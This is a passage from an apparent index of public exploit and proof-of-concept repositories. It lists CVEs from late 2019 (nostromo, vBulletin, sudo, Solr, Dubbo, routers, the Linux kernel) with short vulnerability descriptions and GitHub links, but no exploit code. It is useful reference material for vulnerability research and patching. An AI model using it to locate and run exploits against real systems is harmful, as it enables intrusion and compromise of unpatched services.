- [tronghoang89/cve-2019-16113](https://github.com/tronghoang89/cve-2019-16113)
### CVE-2019-16172 (2019-09-09)
LimeSurvey before v3.17.14 allows stored XSS for escalating privileges from a low-privileged account to, for example, SuperAdmin. The attack uses a survey group in which the title contains JavaScript that is mishandled upon group deletion.
- [TrixSec/CVE-2019-16172](https://github.com/TrixSec/CVE-2019-16172)
### CVE-2019-16253 (2019-09-25)
The Text-to-speech Engine (aka SamsungTTS) application before 3.0.02.7 and 3.0.00.101 for Android allows a local attacker to escalate privileges, e.g., to system privileges. The Samsung case ID is 101755.
- [k0mraid3/K0mraid3s-System-Shell-PREBUILT](https://github.com/k0mraid3/K0mraid3s-System-Shell-PREBUILT)
### CVE-2019-16278 (2019-10-14)
Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.
- [jas502n/CVE-2019-16278](https://github.com/jas502n/CVE-2019-16278)
- [imjdl/CVE-2019-16278-PoC](https://github.com/imjdl/CVE-2019-16278-PoC)
- [ianxtianxt/CVE-2019-16278](https://github.com/ianxtianxt/CVE-2019-16278)
- [darkerego/Nostromo_Python3](https://github.com/darkerego/Nostromo_Python3)
- [AnubisSec/CVE-2019-16278](https://github.com/AnubisSec/CVE-2019-16278)
- [aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE](https://github.com/aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE)
- [Kr0ff/cve-2019-16278](https://github.com/Kr0ff/cve-2019-16278)
- [NHPT/CVE-2019-16278](https://github.com/NHPT/CVE-2019-16278)
- [keshiba/cve-2019-16278](https://github.com/keshiba/cve-2019-16278)
- [h3xcr4ck3r/CVE-2019-16278](https://github.com/h3xcr4ck3r/CVE-2019-16278)
- [alexander-fernandes/CVE-2019-16278](https://github.com/alexander-fernandes/CVE-2019-16278)
- [FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE](https://github.com/FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE)
- [0xTabun/CVE-2019-16278](https://github.com/0xTabun/CVE-2019-16278)
### CVE-2019-16279 (2019-10-14)
A memory error in the function SSL_accept in nostromo nhttpd through 1.9.6 allows an attacker to trigger a denial of service via a crafted HTTP request.
- [ianxtianxt/CVE-2019-16279](https://github.com/ianxtianxt/CVE-2019-16279)
### CVE-2019-16374 (2020-08-13)
Pega Platform 8.2.1 allows LDAP injection because a username can contain a * character and can be of unlimited length. An attacker can specify four characters of a username, followed by the * character, to bypass access control.
- [IAG0110/CVE-2019-16374](https://github.com/IAG0110/CVE-2019-16374)
### CVE-2019-16394 (2019-09-17)
SPIP before 3.1.11 and 3.2 before 3.2.5 provides different error messages from the password-reminder page depending on whether an e-mail address exists, which might help attackers to enumerate subscribers.
- [trungnd51/Silent_CVE_2019_16394](https://github.com/trungnd51/Silent_CVE_2019_16394)
### CVE-2019-16405 (2019-11-21)
Centreon Web before 2.8.30, 18.10.x before 18.10.8, 19.04.x before 19.04.5 and 19.10.x before 19.10.2 allows Remote Code Execution by an administrator who can modify Macro Expression location settings. CVE-2019-16405 and CVE-2019-17501 are similar to one another and may be the same.
- [TheCyberGeek/CVE-2019-16405.rb](https://github.com/TheCyberGeek/CVE-2019-16405.rb)
### CVE-2019-16516 (2020-01-23)
An issue was discovered in ConnectWise Control (formerly known as ScreenConnect) 19.3.25270.7185. There is a user enumeration vulnerability, allowing an unauthenticated attacker to determine with certainty if an account exists for a given username.
- [czz/ScreenConnect-UserEnum](https://github.com/czz/ScreenConnect-UserEnum)
### CVE-2019-16662 (2019-10-28)
An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
- [mhaskar/CVE-2019-16662](https://github.com/mhaskar/CVE-2019-16662)
### CVE-2019-16663 (2019-10-28)
An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to search.crud.php because the catCommand parameter is passed to the exec function without filtering, which can lead to command execution.
- [mhaskar/CVE-2019-16663](https://github.com/mhaskar/CVE-2019-16663)
### CVE-2019-16692 (2019-09-22)
phpIPAM 1.4 allows SQL injection via the app/admin/custom-fields/filter-result.php table parameter when action=add is used.
- [kkirsche/CVE-2019-16692](https://github.com/kkirsche/CVE-2019-16692)
### CVE-2019-16724 (2019-09-24)
File Sharing Wizard 1.5.0 allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter, a similar issue to CVE-2010-2330 and CVE-2010-2331.
- [nanabingies/CVE-2019-16724](https://github.com/nanabingies/CVE-2019-16724)
### CVE-2019-16746 (2019-09-24)
An issue was discovered in net/wireless/nl80211.c in the Linux kernel through 5.2.17. It does not check the length of variable elements in a beacon head, leading to a buffer overflow.
- [uthrasri/CVE-2019-16746](https://github.com/uthrasri/CVE-2019-16746)
### CVE-2019-16759 (2019-09-24)
vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
- [M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit](https://github.com/M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit)
- [r00tpgp/http-vuln-CVE-2019-16759](https://github.com/r00tpgp/http-vuln-CVE-2019-16759)
- [jas502n/CVE-2019-16759](https://github.com/jas502n/CVE-2019-16759)
- [theLSA/vbulletin5-rce](https://github.com/theLSA/vbulletin5-rce)
- [FarjaalAhmad/CVE-2019-16759](https://github.com/FarjaalAhmad/CVE-2019-16759)
- [andripwn/pwn-vbulletin](https://github.com/andripwn/pwn-vbulletin)
- [psychoxploit/vbull](https://github.com/psychoxploit/vbull)
- [polar1s7/CVE-2019-16759-bypass](https://github.com/polar1s7/CVE-2019-16759-bypass)
- [nako48/CVE-2019-16759](https://github.com/nako48/CVE-2019-16759)
- [0xdims/CVE-2019-16759](https://github.com/0xdims/CVE-2019-16759)
- [sunian19/CVE-2019-16759](https://github.com/sunian19/CVE-2019-16759)
- [ludy-dev/vBulletin_Routestring-RCE](https://github.com/ludy-dev/vBulletin_Routestring-RCE)
- [fxp0-4tx/CVE-2019-16759](https://github.com/fxp0-4tx/CVE-2019-16759)
### CVE-2019-16784 (2020-01-14)
In PyInstaller before version 3.6, only on Windows, a local privilege escalation vulnerability is present in this particular case: If a software using PyInstaller in "onefile" mode is launched by a privileged user (at least more than the current one) which have his "TempPath" resolving to a world writable directory. This is the case for example if the software is launched as a service or as a scheduled task using a system account (TempPath will be C:\Windows\Temp). In order to be exploitable the software has to be (re)started after the attacker launch the exploit program, so for a service launched at startup, a service restart is needed (e.g. after a crash or an upgrade).
- [AlterSolutions/PyInstallerPrivEsc](https://github.com/AlterSolutions/PyInstallerPrivEsc)
- [Ckrielle/CVE-2019-16784-POC](https://github.com/Ckrielle/CVE-2019-16784-POC)
### CVE-2019-16889 (2019-09-25)
Ubiquiti EdgeMAX devices before 2.0.3 allow remote attackers to cause a denial of service (disk consumption) because *.cache files in /var/run/beaker/container_file/ are created when providing a valid length payload of 249 characters or fewer to the beaker.session.id cookie in a GET header. The attacker can use a long series of unique session IDs.
- [grampae/CVE-2019-16889-poc](https://github.com/grampae/CVE-2019-16889-poc)
### CVE-2019-16920 (2019-09-27)
Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
- [eniac888/CVE-2019-16920-MassPwn3r](https://github.com/eniac888/CVE-2019-16920-MassPwn3r)
### CVE-2019-16941 (2019-09-28)
NSA Ghidra through 9.0.4, when experimental mode is enabled, allows arbitrary code execution if the Read XML Files feature of Bit Patterns Explorer is used with a modified XML document. This occurs in Features/BytePatterns/src/main/java/ghidra/bitpatterns/info/FileBitPatternInfoReader.java. An attack could start with an XML document that was originally created by DumpFunctionPatternInfoScript but then directly modified by an attacker (for example, to make a java.lang.Runtime.exec call).
- [purpleracc00n/CVE-2019-16941](https://github.com/purpleracc00n/CVE-2019-16941)
### CVE-2019-17026 (2020-03-02)
Incorrect alias information in IonMonkey JIT compiler for setting array elements could lead to a type confusion. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Firefox ESR < 68.4.1, Thunderbird < 68.4.1, and Firefox < 72.0.1.
- [maxpl0it/CVE-2019-17026-Exploit](https://github.com/maxpl0it/CVE-2019-17026-Exploit)
- [lsw29475/CVE-2019-17026](https://github.com/lsw29475/CVE-2019-17026)
### CVE-2019-17041 (2019-10-07)
An issue was discovered in Rsyslog v8.1908.0. contrib/pmaixforwardedfrom/pmaixforwardedfrom.c has a heap overflow in the parser for AIX log messages. The parser tries to locate a log message delimiter (in this case, a space or a colon) but fails to account for strings that do not satisfy this constraint. If the string does not match, then the variable lenMsg will reach the value zero and will skip the sanity check that detects invalid log messages. The message will then be considered valid, and the parser will eat up the nonexistent colon delimiter. In doing so, it will decrement lenMsg, a signed integer, whose value was zero and now becomes minus one. The following step in the parser is to shift left the contents of the message. To do this, it will call memmove with the right pointers to the target and destination strings, but the lenMsg will now be interpreted as a huge value, causing a heap overflow.
- [Resery/CVE-2019-17041](https://github.com/Resery/CVE-2019-17041)
### CVE-2019-17080 (2019-10-02)
mintinstall (aka Software Manager) 7.9.9 for Linux Mint allows code execution if a REVIEWS_CACHE file is controlled by an attacker, because an unpickle occurs. This is resolved in 8.0.0 and backports.
- [Andhrimnirr/Mintinstall-object-injection](https://github.com/Andhrimnirr/Mintinstall-object-injection)
- [materaj2/Mintinstall-object-injection](https://github.com/materaj2/Mintinstall-object-injection)
### CVE-2019-17124 (2019-10-09)
Kramer VIAware 2.5.0719.1034 has Incorrect Access Control.
- [hessandrew/CVE-2019-17124](https://github.com/hessandrew/CVE-2019-17124)
### CVE-2019-17137 (2020-02-10)
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR AC1200 R6220 Firmware version 1.1.0.86 Smart WiFi Router. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of path strings. By inserting a null byte into the path, the user can skip most authentication checks. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-8616.
- [vncloudsco/CVE-2019-17137](https://github.com/vncloudsco/CVE-2019-17137)
### CVE-2019-17147 (2020-01-07)
This vulnerability allows remote attackers to execute arbitrary code on affected installations of TP-LINK TL-WR841N routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web service, which listens on TCP port 80 by default. When parsing the Host request header, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length static buffer. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-8457.
- [DrmnSamoLiu/CVE-2019-17147_Practice_Material](https://github.com/DrmnSamoLiu/CVE-2019-17147_Practice_Material)
### CVE-2019-17195 (2019-10-15)
Connect2id Nimbus JOSE+JWT before v7.9 can throw various uncaught exceptions while parsing a JWT, which could result in an application crash (potential information disclosure) or a potential authentication bypass.
- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021)
### CVE-2019-17221 (2019-11-05)
PhantomJS through 2.1.1 has an arbitrary file read vulnerability, as demonstrated by an XMLHttpRequest for a file:// URI. The vulnerability exists in the page.open() function of the webpage module, which loads a specified URL and calls a given callback. An attacker can supply a specially crafted HTML file, as user input, that allows reading arbitrary files on the filesystem. For example, if page.render() is the function callback, this generates a PDF or an image of the targeted file. NOTE: this product is no longer developed.
- [h4ckologic/CVE-2019-17221](https://github.com/h4ckologic/CVE-2019-17221)
### CVE-2019-17225 (2019-10-06)
Subrion 4.2.1 allows XSS via the panel/members/ Username, Full Name, or Email field, aka an "Admin Member JSON Update" issue.
- [hacker625/CVE-2019-17225](https://github.com/hacker625/CVE-2019-17225)
### CVE-2019-17234 (2019-11-12)
includes/class-coming-soon-creator.php in the igniteup plugin through 3.4 for WordPress allows unauthenticated arbitrary file deletion.
- [administra1tor/CVE-2019-17234b-Exploit](https://github.com/administra1tor/CVE-2019-17234b-Exploit)
### CVE-2019-17240 (2019-10-06)
bl-kernel/security.class.php in Bludit 3.9.2 allows attackers to bypass a brute-force protection mechanism by using many different forged X-Forwarded-For or Client-IP HTTP headers.
- [pingport80/CVE-2019-17240](https://github.com/pingport80/CVE-2019-17240)
- [LucaReggiannini/Bludit-3-9-2-bb](https://github.com/LucaReggiannini/Bludit-3-9-2-bb)
- [triple-octopus/Bludit-CVE-2019-17240-Fork](https://github.com/triple-octopus/Bludit-CVE-2019-17240-Fork)
- [ColdFusionX/CVE-2019-17240_Bludit-BF-Bypass](https://github.com/ColdFusionX/CVE-2019-17240_Bludit-BF-Bypass)
- [jayngng/bludit-CVE-2019-17240](https://github.com/jayngng/bludit-CVE-2019-17240)
- [brunosergi/bloodit](https://github.com/brunosergi/bloodit)
- [spyx/cve-2019-17240](https://github.com/spyx/cve-2019-17240)
- [mind2hex/CVE-2019-17240](https://github.com/mind2hex/CVE-2019-17240)
### CVE-2019-17382 (2019-10-09)
An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
- [K3ysTr0K3R/CVE-2019-17382-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2019-17382-EXPLOIT)
### CVE-2019-17424 (2019-10-22)
A stack-based buffer overflow in the processPrivilage() function in IOS/process-general.c in nipper-ng 0.11.10 allows remote attackers (serving firewall configuration files) to achieve Remote Code Execution or Denial Of Service via a crafted file.
- [mavlevin/CVE-2019-17424](https://github.com/mavlevin/CVE-2019-17424)
### CVE-2019-17427 (2019-10-10)
In Redmine before 3.4.11 and 4.0.x before 4.0.4, persistent XSS exists due to textile formatting errors.
- [RealLinkers/CVE-2019-17427](https://github.com/RealLinkers/CVE-2019-17427)
### CVE-2019-17495 (2019-10-10)
A Cascading Style Sheets (CSS) injection vulnerability in Swagger UI before 3.23.11 allows attackers to use the Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration, such as exfiltration of a CSRF token value. In other words, this product intentionally allows the embedding of untrusted JSON data from remote servers, but it was not previously known that <style>@import within the JSON data was a functional attack method.
- [SecT0uch/CVE-2019-17495-test](https://github.com/SecT0uch/CVE-2019-17495-test)
### CVE-2019-17497 (2019-10-10)
Tracker PDF-XChange Editor before 8.0.330.0 has an NTLM SSO hash theft vulnerability using crafted FDF or XFDF files (a related issue to CVE-2018-4993). For example, an NTLM hash is sent for a link to \\192.168.0.2\C$\file.pdf without user interaction.
- [JM-Lemmi/cve-2019-17497](https://github.com/JM-Lemmi/cve-2019-17497)
### CVE-2019-17498 (2019-10-21)
In libssh2 v1.9.0 and earlier versions, the SSH_MSG_DISCONNECT logic in packet.c has an integer overflow in a bounds check, enabling an attacker to specify an arbitrary (out-of-bounds) offset for a subsequent memory read. A crafted SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server.
- [Timon-L/3007Project](https://github.com/Timon-L/3007Project)
### CVE-2019-17513 (2019-10-18)
An issue was discovered in Ratpack before 1.7.5. Due to a misuse of the Netty library class DefaultHttpHeaders, there is no validation that headers lack HTTP control characters. Thus, if untrusted data is used to construct HTTP headers with Ratpack, HTTP Response Splitting can occur.
- [epicosy/Ratpack-1](https://github.com/epicosy/Ratpack-1)
### CVE-2019-17525 (2020-04-21)
The login page on D-Link DIR-615 T1 20.10 devices allows remote attackers to bypass the CAPTCHA protection mechanism and conduct brute-force attacks.
- [huzaifahussain98/CVE-2019-17525](https://github.com/huzaifahussain98/CVE-2019-17525)
### CVE-2019-17558 (2019-12-30)
Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/` directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled` by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).
- [thelostworldFree/CVE-2019-17558_Solr_Vul_Tool](https://github.com/thelostworldFree/CVE-2019-17558_Solr_Vul_Tool)
- [zhzyker/exphub](https://github.com/zhzyker/exphub)
- [Ma1Dong/Solr_CVE-2019-17558](https://github.com/Ma1Dong/Solr_CVE-2019-17558)
- [xkyrage/Exploit_CVE-2019-17558-RCE](https://github.com/xkyrage/Exploit_CVE-2019-17558-RCE)
### CVE-2019-17564 (2020-04-01)
Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider instance of Apache Dubbo, if this instance enables HTTP. This issue affected Apache Dubbo 2.7.0 to 2.7.4, 2.6.0 to 2.6.7, and all 2.5.x versions.
- [r00t4dm/CVE-2019-17564](https://github.com/r00t4dm/CVE-2019-17564)
- [Jaky5155/CVE-2019-17564](https://github.com/Jaky5155/CVE-2019-17564)
- [Hu3sky/CVE-2019-17564](https://github.com/Hu3sky/CVE-2019-17564)
- [Exploit-3389/CVE-2019-17564](https://github.com/Exploit-3389/CVE-2019-17564)
- [Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget](https://github.com/Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget)
- [fairyming/CVE-2019-17564](https://github.com/fairyming/CVE-2019-17564)
### CVE-2019-17570 (2020-01-23)
An untrusted deserialization was found in the org.apache.xmlrpc.parser.XmlRpcResponseParser:addResult method of Apache XML-RPC (aka ws-xmlrpc) library. A malicious XML-RPC server could target a XML-RPC client causing it to execute arbitrary code. Apache XML-RPC is no longer maintained and this issue will not be fixed.
- [r00t4dm/CVE-2019-17570](https://github.com/r00t4dm/CVE-2019-17570)
- [slowmistio/xmlrpc-common-deserialization](https://github.com/slowmistio/xmlrpc-common-deserialization)
### CVE-2019-17571 (2019-12-20)
Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.
- [shadow-horse/CVE-2019-17571](https://github.com/shadow-horse/CVE-2019-17571)
- [Al1ex/CVE-2019-17571](https://github.com/Al1ex/CVE-2019-17571)
- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder)
### CVE-2019-17596 (2019-10-24)
Go before 1.12.11 and 1.3.x before 1.13.2 can panic upon an attempt to process network traffic containing an invalid DSA public key. There are several attack scenarios, such as traffic from a client to a server that verifies client certificates.
- [pquerna/poc-dsa-verify-CVE-2019-17596](https://github.com/pquerna/poc-dsa-verify-CVE-2019-17596)
### CVE-2019-17621 (2019-12-30)
The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network.
- [Squirre17/CVE-2019-17621](https://github.com/Squirre17/CVE-2019-17621)
### CVE-2019-17625 (2019-10-16)
There is a stored XSS in Rambox 0.6.9 that can lead to code execution. The XSS is in the name field while adding/editing a service. The problem occurs due to incorrect sanitization of the name field when being processed and stored. This allows a user to craft a payload for Node.js and Electron, such as an exec of OS commands within the onerror attribute of an IMG element.
- [Ekultek/CVE-2019-17625](https://github.com/Ekultek/CVE-2019-17625)
### CVE-2019-17633 (2019-12-19)
For Eclipse Che versions 6.16 to 7.3.0, with both authentication and TLS disabled, visiting a malicious web site could trigger the start of an arbitrary Che workspace. Che with no authentication and no TLS is not usually deployed on a public network but is often used for local installations (e.g. on personal laptops). In that case, even if the Che API is not exposed externally, some javascript running in the local browser is able to send requests to it.
- [mgrube/CVE-2019-17633](https://github.com/mgrube/CVE-2019-17633)
### CVE-2019-17638 (2020-07-09)
In Eclipse Jetty, versions 9.4.27.v20200227 to 9.4.29.v20200521, in case of too large response headers, Jetty throws an exception to produce an HTTP 431 error. When this happens, the ByteBuffer containing the HTTP response headers is released back to the ByteBufferPool twice. Because of this double release, two threads can acquire the same ByteBuffer from the pool and while thread1 is about to use the ByteBuffer to write response1 data, thread2 fills the ByteBuffer with other data. Thread1 then proceeds to write the buffer that now contains different data. This results in client1, which issued request1 seeing data from another request or response which could contain sensitive data belonging to client2 (HTTP session ids, authentication credentials, etc.). If the Jetty version cannot be upgraded, the vulnerability can be significantly reduced by configuring a responseHeaderSize significantly larger than the requestHeaderSize (12KB responseHeaderSize and 8KB requestHeaderSize).
- [forse01/CVE-2019-17638-Jetty](https://github.com/forse01/CVE-2019-17638-Jetty)
### CVE-2019-17658 (2020-03-12)
An unquoted service path vulnerability in the FortiClient FortiTray component of FortiClientWindows v6.2.2 and prior allow an attacker to gain elevated privileges via the FortiClientConsole executable service path.
- [Ibonok/CVE-2019-17658](https://github.com/Ibonok/CVE-2019-17658)
### CVE-2019-17662 (2019-10-16)
ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
- [MuirlandOracle/CVE-2019-17662](https://github.com/MuirlandOracle/CVE-2019-17662)
- [kxisxr/Bash-Script-CVE-2019-17662](https://github.com/kxisxr/Bash-Script-CVE-2019-17662)
- [whokilleddb/CVE-2019-17662](https://github.com/whokilleddb/CVE-2019-17662)
- [rajendrakumaryadav/CVE-2019-17662-Exploit](https://github.com/rajendrakumaryadav/CVE-2019-17662-Exploit)
- [Tamagaft/CVE-2019-17662](https://github.com/Tamagaft/CVE-2019-17662)
- [bl4ck574r/CVE-2019-17662](https://github.com/bl4ck574r/CVE-2019-17662)
- [thomas-osgood/CVE-2019-17662](https://github.com/thomas-osgood/CVE-2019-17662)
- [medarov411/vnc-lab-cve-2019-17662](https://github.com/medarov411/vnc-lab-cve-2019-17662)
### CVE-2019-17666 (2019-10-17)
rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel through 5.3.6 lacks a certain upper-bound check, leading to a buffer overflow.
- [uthrasri/CVE-2019-17666](https://github.com/uthrasri/CVE-2019-17666)
### CVE-2019-17671 (2019-10-17)
In WordPress before 5.2.4, unauthenticated viewing of certain content is possible because the static query property is mishandled.
- [rhbb/CVE-2019-17671](https://github.com/rhbb/CVE-2019-17671)
### CVE-2019-18276 (2019-11-28)
An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected.
- [M-ensimag/CVE-2019-18276](https://github.com/M-ensimag/CVE-2019-18276)
- [SABI-Ensimag/CVE-2019-18276](https://github.com/SABI-Ensimag/CVE-2019-18276)
### CVE-2019-18370 (2019-10-23)
An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress, so one can control the contents of the files in the decompressed directory. In addition, the application's sh script for testing upload and download speeds reads a URL list from /tmp/speedtest_urls.xml, and there is a command injection vulnerability, as demonstrated by api/xqnetdetect/netspeed.
- [FzBacon/CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis](https://github.com/FzBacon/CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis)
### CVE-2019-18371 (2019-10-23)
An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. There is a directory traversal vulnerability to read arbitrary files via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.
- [UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC)
- [AjayMT6/UltramanGaia](https://github.com/AjayMT6/UltramanGaia)
- [jsnhcuan1997/UltramanGaia](https://github.com/jsnhcuan1997/UltramanGaia)
### CVE-2019-18426 (2020-01-21)
A vulnerability in WhatsApp Desktop versions prior to 0.3.9309 when paired with WhatsApp for iPhone versions prior to 2.20.10 allows cross-site scripting and local file reading. Exploiting the vulnerability requires the victim to click a link preview from a specially crafted text message.
- [PerimeterX/CVE-2019-18426](https://github.com/PerimeterX/CVE-2019-18426)
### CVE-2019-18634 (2020-01-29)
In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. (pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for upstream and many other packages, and would exist only if enabled by an administrator.) The attacker needs to deliver a long string to the stdin of getln() in tgetpass.c.
- [Plazmaz/CVE-2019-18634](https://github.com/Plazmaz/CVE-2019-18634)
- [saleemrashid/sudo-cve-2019-18634](https://github.com/saleemrashid/sudo-cve-2019-18634)
- [N1et/CVE-2019-18634](https://github.com/N1et/CVE-2019-18634)
- [ptef/CVE-2019-18634](https://github.com/ptef/CVE-2019-18634)
- [edsonjt81/sudo-cve-2019-18634](https://github.com/edsonjt81/sudo-cve-2019-18634)
- [paras1te-x/CVE-2019-18634](https://github.com/paras1te-x/CVE-2019-18634)
- [aesophor/CVE-2019-18634](https://github.com/aesophor/CVE-2019-18634)
- [TheJoyOfHacking/saleemrashid-sudo-cve-2019-18634](https://github.com/TheJoyOfHacking/saleemrashid-sudo-cve-2019-18634)
- [DDayLuong/CVE-2019-18634](https://github.com/DDayLuong/CVE-2019-18634)
- [chanbakjsd/CVE-2019-18634](https://github.com/chanbakjsd/CVE-2019-18634)
### CVE-2019-18655 (2019-11-12)
File Sharing Wizard version 1.5.0 build 2008 is affected by a Structured Exception Handler based buffer overflow vulnerability. An unauthenticated attacker is able to perform remote command execution and obtain a command shell by sending a HTTP GET request including the malicious payload in the URL. A similar issue to CVE-2019-17415, CVE-2019-16724, and CVE-2010-2331.
- [0xhuesca/CVE-2019-18655](https://github.com/0xhuesca/CVE-2019-18655)
### CVE-2019-18683 (2019-11-04)
An issue was discovered in drivers/media/platform/vivid in the Linux kernel through 5.3.8. It is exploitable for privilege escalation on some Linux distributions where local users have /dev/video0 access, but only if the driver happens to be loaded. There are multiple race conditions during streaming stopping in this driver (part of the V4L2 subsystem). These issues are caused by wrong mutex locking in vivid_stop_generating_vid_cap(), vivid_stop_generating_vid_out(), sdr_cap_stop_streaming(), and the corresponding kthreads. At least one of these race conditions leads to a use-after-free.
- [sanjana123-cloud/CVE-2019-18683](https://github.com/sanjana123-cloud/CVE-2019-18683)
- [Limesss/cve-2019-18683](https://github.com/Limesss/cve-2019-18683)
### CVE-2019-18818 (2019-11-07)
strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
- [guglia001/CVE-2019-18818](https://github.com/guglia001/CVE-2019-18818)
- [rasyidfox/CVE-2019-18818](https://github.com/rasyidfox/CVE-2019-18818)
- [hadrian3689/strapi_cms_3.0.0-beta.17.7](https://github.com/hadrian3689/strapi_cms_3.0.0-beta.17.7)
- [Hackhoven/Strapi-RCE](https://github.com/Hackhoven/Strapi-RCE)
### CVE-2019-18845 (2019-11-09)
The MsIo64.sys and MsIo32.sys drivers in Patriot Viper RGB before 1.1 allow local users (including low integrity processes) to read and write to arbitrary memory locations, and consequently gain NT AUTHORITY\SYSTEM privileges, by mapping \Device\PhysicalMemory into the calling process via ZwOpenSection and ZwMapViewOfSection.
- [fengjixuchui/CVE-2019-18845](https://github.com/fengjixuchui/CVE-2019-18845)
### CVE-2019-18873 (2019-11-12)
FUDForum 3.0.9 is vulnerable to Stored XSS via the User-Agent HTTP header. This may result in remote code execution. An attacker can use a user account to fully compromise the system via a GET request. When the admin visits user information under "User Manager" in the control panel, the payload will execute. This will allow for PHP files to be written to the web root, and for code to execute on the remote server. The problem is in admsession.php and admuser.php.
- [fuzzlove/FUDforum-XSS-RCE](https://github.com/fuzzlove/FUDforum-XSS-RCE)
### CVE-2019-18885 (2019-11-14)
fs/btrfs/volumes.c in the Linux kernel before 5.1 allows a btrfs_verify_dev_extents NULL pointer dereference via a crafted btrfs image because fs_devices->devices is mishandled within find_device, aka CID-09ba3bc9dd15.
- [bobfuzzer/CVE-2019-18885](https://github.com/bobfuzzer/CVE-2019-18885)
### CVE-2019-18890 (2019-11-21)
A SQL injection vulnerability in Redmine through 3.2.9 and 3.3.x before 3.3.10 allows Redmine users to access protected information via a crafted object query.
- [RealLinkers/CVE-2019-18890](https://github.com/RealLinkers/CVE-2019-18890)
### CVE-2019-18935 (2019-12-11)
Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)
- [bao7uo/RAU_crypto](https://github.com/bao7uo/RAU_crypto)
- [noperator/CVE-2019-18935](https://github.com/noperator/CVE-2019-18935)
- [becrevex/Telerik_CVE-2019-18935](https://github.com/becrevex/Telerik_CVE-2019-18935)
